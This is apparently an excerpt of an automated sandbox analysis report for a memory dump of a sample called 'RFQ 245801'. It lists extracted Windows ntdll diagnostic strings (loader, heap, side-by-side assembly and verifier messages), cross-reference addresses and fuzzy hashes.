• String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
• API String ID: 0-2368682639
Strings
• SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 017922E4
• @, xrefs: 0179259B
• SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01792409
• SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01792602
• RtlpResolveAssemblyStorageMapEntry, xrefs: 0179261F
• SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01792498
• SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01792506
• SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01792412
• SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01792624
• SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 017925EB
• SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 017924C0
Memory Dump Source
• Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
Similarity
• API ID:
• String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
• API String ID: 0-4009184096
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                                                                                                  • API String ID: 0-2515994595
                                                                                                                                                                                  • Opcode ID: 0255006c204b60f049dd1fe94d120493c52d1bc93651e73009743e5789e1350f
                                                                                                                                                                                  • Instruction ID: 424885e97c3c6c5f589febec666c91ea01141018966b81f570c3032aa60b7966
                                                                                                                                                                                  • Opcode Fuzzy Hash: 0255006c204b60f049dd1fe94d120493c52d1bc93651e73009743e5789e1350f
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9A51BD715143119BD339CF288844BABFBECEF98B50F14496DEA9AC3245E770D644CB92
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                                                                                  • API String ID: 0-1700792311
                                                                                                                                                                                  • Opcode ID: 13e2a0fd41de6a258305842781a817fd8cfe220d7a48521c181d8e8b14f0f0a6
                                                                                                                                                                                  • Instruction ID: cd869c5d9dd4107611c4cd77b53a878a05802e1bcba8382563e1e070b6d1ba20
                                                                                                                                                                                  • Opcode Fuzzy Hash: 13e2a0fd41de6a258305842781a817fd8cfe220d7a48521c181d8e8b14f0f0a6
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7BD1CA3560068ADFDB22DFACC444AAEFBF2FF4A710F189059F9469B256C7349981CB10
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 017A8A67
                                                                                                                                                                                  • VerifierDlls, xrefs: 017A8CBD
                                                                                                                                                                                  • HandleTraces, xrefs: 017A8C8F
                                                                                                                                                                                  • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 017A8A3D
                                                                                                                                                                                  • VerifierDebug, xrefs: 017A8CA5
                                                                                                                                                                                  • AVRF: -*- final list of providers -*- , xrefs: 017A8B8F
                                                                                                                                                                                  • VerifierFlags, xrefs: 017A8C50
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                                                                                                  • API String ID: 0-3223716464
                                                                                                                                                                                  • Opcode ID: 47557527c9cbdfd01b9b7f0a8cd04aa51a3c9914bf4f9a674c14f15599e62b91
                                                                                                                                                                                  • Instruction ID: 54ca0973da4dbd26530540bdd30b5d7449d9a542f89f09b45a5b7129c684307f
                                                                                                                                                                                  • Opcode Fuzzy Hash: 47557527c9cbdfd01b9b7f0a8cd04aa51a3c9914bf4f9a674c14f15599e62b91
                                                                                                                                                                                  • Instruction Fuzzy Hash: 25915873641302EFD721EF68C894B5BF7E8ABD9B15F840658FA41AB244C7709E40CB92
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                                                                                                  • API String ID: 0-1109411897
                                                                                                                                                                                  • Opcode ID: 5c30c818792b354b2d10fcc43edb6c18a37993286a25eb4b201979290cd5506e
                                                                                                                                                                                  • Instruction ID: db8752f54228dfca73b19b8220056b64f476c517fa7074d6b3c659b162ce584f
                                                                                                                                                                                  • Opcode Fuzzy Hash: 5c30c818792b354b2d10fcc43edb6c18a37993286a25eb4b201979290cd5506e
                                                                                                                                                                                  • Instruction Fuzzy Hash: 41A22974A0562A8FDB64DF18CC987A9FBB5AF45304F2442E9D90EA7254DB709EC1CF40
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                  • API String ID: 0-792281065
                                                                                                                                                                                  • Opcode ID: 06776754f938e88a5b7c5338a4f0c3c34f2fdffa24149eb3b3177e320f1d85c1
                                                                                                                                                                                  • Instruction ID: 0c3004847f5ce77fa99c7647d61851295e718d9af79cd1004b30111cf45f3676
                                                                                                                                                                                  • Opcode Fuzzy Hash: 06776754f938e88a5b7c5338a4f0c3c34f2fdffa24149eb3b3177e320f1d85c1
                                                                                                                                                                                  • Instruction Fuzzy Hash: F2916C72B403169BDF35DF58E948BAAFBA5FB41B24F500168FE0167289D7B05A42CB90
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01779A2A
                                                                                                                                                                                  • LdrpInitShimEngine, xrefs: 017799F4, 01779A07, 01779A30
                                                                                                                                                                                  • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 017799ED
                                                                                                                                                                                  • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01779A01
                                                                                                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 01779A11, 01779A3A
                                                                                                                                                                                  • apphelp.dll, xrefs: 01716496
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                  • API String ID: 0-204845295
                                                                                                                                                                                  • Opcode ID: e49cd75af94a2931510ca99bce9f6f1582fb6979c96387e506e049c9dd7ab350
                                                                                                                                                                                  • Instruction ID: a54c2a807c0ad568638060b8763c4b4af067afce1b187b9850018621e5a01c14
                                                                                                                                                                                  • Opcode Fuzzy Hash: e49cd75af94a2931510ca99bce9f6f1582fb6979c96387e506e049c9dd7ab350
                                                                                                                                                                                  • Instruction Fuzzy Hash: 66510572209301DFDB21EF28C845BABF7E8FB84658F10091DFA8597165DB70EA44CB92
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 017921BF
                                                                                                                                                                                  • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0179219F
                                                                                                                                                                                  • RtlGetAssemblyStorageRoot, xrefs: 01792160, 0179219A, 017921BA
                                                                                                                                                                                  • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01792178
                                                                                                                                                                                  • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01792180
                                                                                                                                                                                  • SXS: %s() passed the empty activation context, xrefs: 01792165
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                                                                                  • API String ID: 0-861424205
                                                                                                                                                                                  • Opcode ID: 9ecceaba6c5e232276472825c3a65bf0ee1f54b14092e07381693bced36361c1
                                                                                                                                                                                  • Instruction ID: a7bde55655de706103a5b837f173892afdf5502bd6b97fe86b492da32719a91f
                                                                                                                                                                                  • Opcode Fuzzy Hash: 9ecceaba6c5e232276472825c3a65bf0ee1f54b14092e07381693bced36361c1
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8F3139B6B80315F7EB21DA999C85F5FFAB8DB65A40F050059FB0467286D3B0AE00C3A0
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • Loading import redirection DLL: '%wZ', xrefs: 01798170
                                                                                                                                                                                  • LdrpInitializeProcess, xrefs: 0175C6C4
                                                                                                                                                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 01798181, 017981F5
                                                                                                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 0175C6C3
                                                                                                                                                                                  • LdrpInitializeImportRedirection, xrefs: 01798177, 017981EB
                                                                                                                                                                                  • Unable to build import redirection Table, Status = 0x%x, xrefs: 017981E5
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                                                                                  • API String ID: 0-475462383
                                                                                                                                                                                  • Opcode ID: 1057e5786fc599db291060d32a63e890f6d1d094d4bd5c48e01bc6d20b5d3ee3
                                                                                                                                                                                  • Instruction ID: 50efeb5e8ee26ef1f24b5f1832fc7f1c6d9860322028828615439413e4f0ac64
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1057e5786fc599db291060d32a63e890f6d1d094d4bd5c48e01bc6d20b5d3ee3
                                                                                                                                                                                  • Instruction Fuzzy Hash: C531E4B26443069FD321EF28DC49E2AF7D8EF95B10F04055CF941AB299D660ED04C7A2
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 01762DF0: LdrInitializeThunk.NTDLL ref: 01762DFA
                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01760BA3
                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01760BB6
                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01760D60
                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01760D74
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1404860816-0
                                                                                                                                                                                  • Opcode ID: 83f1c30214d5ae07c48dcebb8d15807debf62bf1f1e8dca116419813b44b7b2f
                                                                                                                                                                                  • Instruction ID: 298e506122e2ef465eef6cce5443ef1fa643323b92a149b412061e71f0bca7f6
                                                                                                                                                                                  • Opcode Fuzzy Hash: 83f1c30214d5ae07c48dcebb8d15807debf62bf1f1e8dca116419813b44b7b2f
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6B425D71900715DFDB61CF28C884BAAB7F9FF48314F1445AAE989DB245E770AA84CF60
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                                                                                  • API String ID: 0-379654539
                                                                                                                                                                                  • Opcode ID: 548e7bfd93300458b1a1686b66c0c13907bbdd383b79834c16e9a1ebfa9a1550
                                                                                                                                                                                  • Instruction ID: e1442fb5502c17571284663e9498bc16824eb895af2569cec115048c909ad4cc
                                                                                                                                                                                  • Opcode Fuzzy Hash: 548e7bfd93300458b1a1686b66c0c13907bbdd383b79834c16e9a1ebfa9a1550
                                                                                                                                                                                  • Instruction Fuzzy Hash: F7C1BA70108392CFD721DF59C144B6AFBE4FF94304F0489AAF9968BA51E334CA4ACB52
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0175855E
                                                                                                                                                                                  • LdrpInitializeProcess, xrefs: 01758422
                                                                                                                                                                                  • @, xrefs: 01758591
                                                                                                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 01758421
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                  • API String ID: 0-1918872054
                                                                                                                                                                                  • Opcode ID: f626bbc94354c7186721b8d20a6d1870810694c7467ba69f399b8d16718b4cc9
                                                                                                                                                                                  • Instruction ID: 7253cf5f8024ebf96f597e524b6814d57b616e56a7f8f0c414ea0cbde554013c
                                                                                                                                                                                  • Opcode Fuzzy Hash: f626bbc94354c7186721b8d20a6d1870810694c7467ba69f399b8d16718b4cc9
                                                                                                                                                                                  • Instruction Fuzzy Hash: D6919B71548345AFDB62DF26CC44FABFAECFB84684F40092EFA8896155E770D9048B63
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 017922B6
                                                                                                                                                                                  • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 017921D9, 017922B1
                                                                                                                                                                                  • .Local, xrefs: 017528D8
                                                                                                                                                                                  • SXS: %s() passed the empty activation context, xrefs: 017921DE
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                                                                                  • API String ID: 0-1239276146
                                                                                                                                                                                  • Opcode ID: 5664e47b0dcf912ab1412f4f4c21ce202c0ff37e43499069d552ae061a06fc43
                                                                                                                                                                                  • Instruction ID: fd250eb193926f936f7e31ca75b53a53e3bbd56c612242a5179b674cff0fc357
                                                                                                                                                                                  • Opcode Fuzzy Hash: 5664e47b0dcf912ab1412f4f4c21ce202c0ff37e43499069d552ae061a06fc43
                                                                                                                                                                                  • Instruction Fuzzy Hash: A2A1BE31944229DBDB65DF68D888BA9F7B0BF58314F2501E9DD08AB352D7709E84CF90
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01793437
                                                                                                                                                                                  • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0179342A
                                                                                                                                                                                  • RtlDeactivateActivationContext, xrefs: 01793425, 01793432, 01793451
                                                                                                                                                                                  • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01793456
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                                                                                                                  • API String ID: 0-1245972979
                                                                                                                                                                                  • Opcode ID: 3c8e57c145ff1849f13a3891823b9cae461e41030f169a02d235a86d6a5e0989
                                                                                                                                                                                  • Instruction ID: 07f265c53810513e4e3b694b74ac580ef6125ed54c84b33e5daad3f8c8d1ff76
                                                                                                                                                                                  • Opcode Fuzzy Hash: 3c8e57c145ff1849f13a3891823b9cae461e41030f169a02d235a86d6a5e0989
                                                                                                                                                                                  • Instruction Fuzzy Hash: D0613476604B129BDB22CF2CC885B3AF7E1BF80B50F158559EC569B291E770EC41CB91
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0178106B
                                                                                                                                                                                  • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01781028
                                                                                                                                                                                  • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 017810AE
                                                                                                                                                                                  • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01780FE5
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                                                                                  • API String ID: 0-1468400865
                                                                                                                                                                                  • Opcode ID: 526fa3efb6e44a0765825f4fb5f37c448d6c7b5e90e1a8ed0673de6e97b40941
                                                                                                                                                                                  • Instruction ID: bcbe1a320d2ebd5edc350c5e78a5339bc746e8df7e7a3d2501e45a3a26cd2abc
                                                                                                                                                                                  • Opcode Fuzzy Hash: 526fa3efb6e44a0765825f4fb5f37c448d6c7b5e90e1a8ed0673de6e97b40941
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7A71E3B19043159FCB21EF19C888B9BBFA8EF94764F500469FD488B14AD334D589CBD2
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • LdrpDynamicShimModule, xrefs: 0178A998
                                                                                                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 0178A9A2
                                                                                                                                                                                  • apphelp.dll, xrefs: 01742462
                                                                                                                                                                                  • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0178A992
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                  • API String ID: 0-176724104
                                                                                                                                                                                  • Opcode ID: af68c29aedbf4c66b0b088be0dfeaef9ddafbabf06e4d26b17a7971867058cc1
                                                                                                                                                                                  • Instruction ID: 5b1b71c2057f22ad524ea62e24e14d29c56bae0c563780150a9632fe815c2e8b
                                                                                                                                                                                  • Opcode Fuzzy Hash: af68c29aedbf4c66b0b088be0dfeaef9ddafbabf06e4d26b17a7971867058cc1
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3F312A77640202ABDB31AF5DD885E6AFBB8FB84714F26005AFD01A7249D7B05A41CB40
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • HEAP: , xrefs: 01733264
                                                                                                                                                                                  • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0173327D
                                                                                                                                                                                  • HEAP[%wZ]: , xrefs: 01733255
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
Similarity
• API ID:
• String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
• API String ID: 0-617086771
• Opcode ID: 061dad94a5e6df17c526cb95543c0b923feeab6042300fe9f22b0fe3abeed9c8
• Instruction ID: 6d9ef0ee985e5aafab084fec2d092322e071d686ca71c999b661f3be137bc984
• Opcode Fuzzy Hash: 061dad94a5e6df17c526cb95543c0b923feeab6042300fe9f22b0fe3abeed9c8
• Instruction Fuzzy Hash: 63929A71A046499FEB25CF68C444BAEFBF1FF88300F188099E959AB392D735A945CF50
Strings
Memory Dump Source
• Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
Similarity
• API ID:
• String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
• API String ID: 0-4253913091
• Opcode ID: 62b4da434b645814e0e45186ba4ba17f8dca39d1775f0804cb837393180d3e20
• Instruction ID: 29321822eee6bba1b9de94d38d6221337ff291e1e0c6ee4fc84571cbb21b5b03
• Opcode Fuzzy Hash: 62b4da434b645814e0e45186ba4ba17f8dca39d1775f0804cb837393180d3e20
• Instruction Fuzzy Hash: ABF1BE70A40606DFEB25DF68C894B6AF7F5FF84304F1481A8E5169B386D734EA81CB90
Strings
Memory Dump Source
• Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
Similarity
• API ID: InitializeThunk
• String ID: $@
• API String ID: 2994545307-1077428164
• Opcode ID: dcb329dc1fb1b03771abfadf3c46bfbb24f0c9a5df5cad27fb6d66352f472771
• Instruction ID: 7758d3631844b52ac7abe1bbad1c800a5075a946ea4543a1b62b50a0e955725a
• Opcode Fuzzy Hash: dcb329dc1fb1b03771abfadf3c46bfbb24f0c9a5df5cad27fb6d66352f472771
• Instruction Fuzzy Hash: FAC27F716083419FE72ACF28C881BABFBE5AF89754F04896DF999C7241D734D844CB62
Strings
Memory Dump Source
• Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
Similarity
• API ID:
• String ID: FilterFullPath$UseFilter$\??\
• API String ID: 0-2779062949
